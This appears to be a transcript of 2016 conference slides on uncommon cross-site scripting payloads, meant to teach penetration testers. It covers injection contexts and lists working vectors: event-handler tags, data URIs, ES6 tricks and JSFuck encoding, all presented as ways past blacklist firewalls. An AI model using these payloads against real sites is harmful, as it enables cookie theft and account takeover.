ESOTERIC XSS PAYLOADS c0c0n2016 @riyazwalikar @wincmdfu RIYAZ WALIKAR Chief Offensive Security Officer @Appsecco Security evangelist, leader for null Bangalore and OWASP chapters Trainer/Speaker : BlackHat, defcon, nullcon, c0c0n, OWASP AppSec USA Twitter : @riyazwalikar and @wincmdfu http://ibreak.soware WHAT IS THIS TALK ABOUT? Quick contexts Uncommon XSS vectors WHAT ARE INJECTION CONTEXTS? Just like the word 'date' could mean a fruit, a point in time or a romantic meeting based on the context in which it appears, the impact that user input appearing in the page would depend on the context in which the browser tries to interpret the user input. Lavakumar Kuppan, IronWASP 3 MOST COMMON INJECTION CONTEXTS HTML context HTML Element context Script context HTML CONTEXT <html> <body> Welcome user_tainted_input! </body> </html> HTML ELEMENT CONTEXT <html> <body> Welcome bob! <input id="user" name="user" value=user_tainted_input> </body> </html> SCRIPT CONTEXT <html> <body> Welcome bob! <script> var a = user_tainted_input; </script> </body> </html> Common vectors? <script>alert(document.cookie)</script> <svg onload=alert(document.cookie)> <input onfocus=alert(document.cookie) autofocus> Multiple ways of representation document.cookie document['cookie'] document['coo'+'kie'] eval('doc'+'ument')['coo'+ 'kie'] Autoscrolling the page <body onscroll=alert(1)> <br> <br> <br> <br> <br> <br> ... <br> <br> <br> <br> <br> <input autofocus> New HTML Elements <video><source onerror="alert(1)"> <details open ontoggle="alert(1)"> <!­­ Chrome only ­­> Using the CDATA section inside SVG <svg><![CDATA[><image xlink:href="]]> <img src=xx:x onerror=alert(2)//"></svg> Using DATA URIs <object data="data:text/html;base64, PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object> <embed src="data:text/html;base64, PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed> Using the embed tag <embed src="javascript:alert(1)"></embed> Overwriting the ReferenceError object <script> ReferenceError.prototype.__defineGetter__('name', function() {alert(1)}),x </script> ES6 Computed properties ({[alert(1)]: 1}) ({[eval('ale'+'rt')(0)]: 1 }) Back ticks FTW! No enclosing brackets required: alert `1` Expansion of \u{61} and backticks loc\u{61}tion=j\u{61}vascript:alert`1` Prototyping the .toString() method Object.prototype[Symbol.toStringTag]='<img src=1 onerror=alert(0)>'; location='javascript:1+{}' JSFUCK JSFuck is an esoteric and educational programming style based on the atomic parts of JavaScript. It uses only six different characters to write and execute code - ()+[]! false => ![] true => !![] undefined => [][[]] NaN => +[![]] 0 => +[] 1 => +!+[] 2 => !+[]+!+[] 10 => [+!+[]]+[+[]] Array => [] Number => +[] String => []+[] Boolean => ![] Function => []["filter"] eval => []["filter"]["constructor"]( CODE )() window => []["filter"]["constructor"]("return this")() alert(0) (![]+[])[1]+(![]+[])[2]+(![]+[])[4]+(!![]+[])[1]+(!![]+[])[0]+"(0)" The ES6 specification coupled with new HTML 5 elements and event handlers can be used to bypass most blacklist based web application firewalls. A lot of active research has been done in this area by @0x6D6172696F and the good folks at cure53 Q & A http://ibreak.soware @riyazwalikar @wincmdfu REFERENCES: http://blog.ironwasp.org/2014/07/contexts-and-cross- site-scripting-brief.html https://github.com/riyazwalikar/simplexssapp https://html5sec.org/ http://www.jsfuck.com/ http://blog.innerht.ml/cascading-style-scripting https://cure53.de/es6-for-penetration-testers.pdf.